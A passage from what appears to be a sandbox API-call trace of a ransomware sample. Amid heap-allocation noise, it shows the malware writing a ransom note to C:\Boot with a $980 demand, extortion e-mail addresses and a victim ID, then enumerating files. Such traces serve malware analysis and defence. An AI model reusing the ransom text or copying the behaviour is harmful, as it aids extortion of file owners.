hHeap=0x750000) returned 1 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.547] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.547] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x32ef368 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.549] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.549] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db38 | out: hHeap=0x750000) returned 1 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.550] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.550] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.550] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x32ef368 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.551] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.551] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.552] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.552] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.553] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.553] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.553] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.553] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.553] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.553] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.553] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.553] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.553] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.553] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.553] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.553] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.553] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.553] PathFindFileNameW (pszPath="") returned="" [0209.553] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.554] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.554] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32ef368 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.554] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.554] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.554] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.554] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0209.554] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.556] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.556] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0209.556] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a86060 [0209.557] lstrcpyW (in: lpString1=0x3a86060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.557] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.557] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.557] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.557] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.557] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a86060 | out: hHeap=0x750000) returned 1 [0209.557] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.557] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.557] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.558] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xf188d700, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xf188d700, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1c) returned 0x3286418 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286508 [0209.558] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.558] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, 